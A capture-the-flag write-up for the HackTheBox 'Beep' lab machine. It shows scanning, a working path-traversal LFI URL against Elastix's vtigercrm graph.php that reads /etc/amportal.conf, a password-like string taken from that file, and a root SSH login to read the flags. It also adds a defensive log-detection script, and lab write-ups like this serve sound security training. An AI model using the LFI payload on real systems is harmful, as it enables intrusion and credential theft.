HackTheBox Beep Writeup
Explore the fundamentals of cybersecurity in the Beep Capture The Flag (CTF) challenge, an easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts
10.10.10.7 beep.htb
Script to add hosts automatically
ip="10.10.10.7"
domain="beep.htb"
# Append the entry only if it is not already present in /etc/hosts
grep -qF "$ip $domain" /etc/hosts || echo "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sV -sC -F --version-light 10.10.10.7
Nmap scan report for beep.htb (10.10.10.7)
Host is up (0.070s latency).
Not shown: 89 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open http Apache httpd 2.2.3
|_http-title: Did not follow redirect to https://beep.htb/
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: LOGIN-DELAY(0) IMPLEMENTATION(Cyrus POP3 server v2) RESP-CODES EXPIRE(NEVER) TOP UIDL USER AUTH-RESP-CODE PIPELINING STLS APOP
111/tcp open rpcbind
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: ID THREAD=REFERENCES ACL Completed QUOTA UNSELECT OK URLAUTHA0001 CHILDREN ANNOTATEMORE LITERAL+ NAMESPACE LIST-SUBSCRIBED RENAME LISTEXT NO STARTTLS ATOMIC IDLE RIGHTS=kxte CONDSTORE CATENATE SORT=MODSEQ IMAP4rev1 IMAP4 THREAD=ORDEREDSUBJECT MAILBOX-REFERRALS BINARY MULTIAPPEND SORT X-NETSCAPE UIDPLUS
443/tcp open ssl/https?
|_ssl-date: 2024-10-20T12:18:56+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after: 2018-04-07T08:22:08
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql?
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com
Accessing Beep HTB via Deprecated SSL
Note: The TLS version on Beep HTB is outdated (TLS 1.0), so it won’t open in modern browsers by default.
To enable access in Firefox:
- Go to about:config.
- Set the following:
security.tls.version.enable-deprecated = true
This preference re-enables TLS 1.0 and 1.1 for every site, so revert it once you are done with the box.
Now, you can access https://beep.htb/.
Searching for Vulnerabilities in Elastix
To begin, search for vulnerabilities related to Elastix using searchsploit:
searchsploit elastix
CVE-2012-4869 - Local File Inclusion (LFI)
There is a known Local File Inclusion (LFI) vulnerability in Elastix that can be exploited via the vtigercrm component.
Exploit Reference:
Exploit-DB #37637
LFI URL:
https://beep.htb/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
View the page source so the included file is shown with its original line breaks. This exploit can reveal sensitive information, such as the string jEhdIekWmdjE.
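As an added defender's example (not part of the original writeup), the following Python scans constructed Apache access-log lines for the traversal plus null-byte pattern used against the current_language parameter of graph.php, and shows the allow-list check that would have kept such a value out of a file include. The log lines, client IP and allow-list regex are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache access-log sample (not from the page): a benign request, the
# traversal + null-byte request from the writeup, and a double-percent-encoded variant.
SAMPLE_LOG = """\
10.10.14.5 - - [20/Oct/2024:12:20:01 +0000] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts&action HTTP/1.1" 200 512
10.10.14.5 - - [20/Oct/2024:12:20:09 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 2048
10.10.14.5 - - [20/Oct/2024:12:20:15 +0000] "GET /index.php HTTP/1.1" 200 4096
10.10.14.5 - - [20/Oct/2024:12:20:21 +0000] "GET /vtigercrm/graph.php?current_language=..%252F..%252Fetc%252Famportal.conf%2500&module=Accounts HTTP/1.1" 200 2048
"""

# Common Log Format: client ident user [timestamp] "METHOD target PROTO" status bytes
REQUEST_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Hypothetical allow-list for current_language: the fix is to never build a file path from it.
LANG_OK = re.compile(r"^[a-z]{2}_[a-z]{2}$")

def is_safe_language(value):
    """Accept only codes like 'en_us'; anything else must not reach an include/require."""
    return bool(LANG_OK.match(value))

def suspicious_params(target):
    """Return [(param, reasons)] for query values carrying traversal or a null byte.
    parse_qs decodes once; the extra unquote exposes double-encoded payloads."""
    findings = []
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for raw in values:
            decoded = unquote(raw)
            reasons = []
            if "../" in decoded or "..\\" in decoded:
                reasons.append("traversal")
            if "\x00" in decoded:  # null byte used to cut off a server-appended extension
                reasons.append("null-byte")
            if reasons:
                findings.append((name, "+".join(reasons)))
    return findings

def detect(log_text):
    """Scan access-log text; return one record per request with a suspicious query value."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and (findings := suspicious_params(m["target"])):
            hits.append({"src": m["src"], "ts": m["ts"], "path": urlsplit(m["target"]).path,
                         "status": int(m["status"]), "findings": findings})
    return hits
```

Running detect(SAMPLE_LOG) returns the two graph.php requests and ignores the benign en_us one; a 200 status on those hits means the file was actually served.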
Exploiting Further via SSH
After revealing sensitive information through the LFI exploit, you can attempt to connect to the machine via SSH. However, since the system is old and uses deprecated security settings, the connection might not work with modern distributions like Arch Linux, which have stricter default algorithms.
To proceed, first scan the supported SSH algorithms on the target machine:
nmap -p22 -sV --script ssh2-enum-algos 10.10.10.7
If older algorithms are required, use the following SSH options to specify deprecated algorithms. Passing them on the command line keeps the legacy algorithms out of your ~/.ssh/config:
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedKeyTypes=+ssh-rsa root@10.10.10.7
Once connected, retrieve the flags:
cat /home/fanis/user.txt
cat /root/root.txt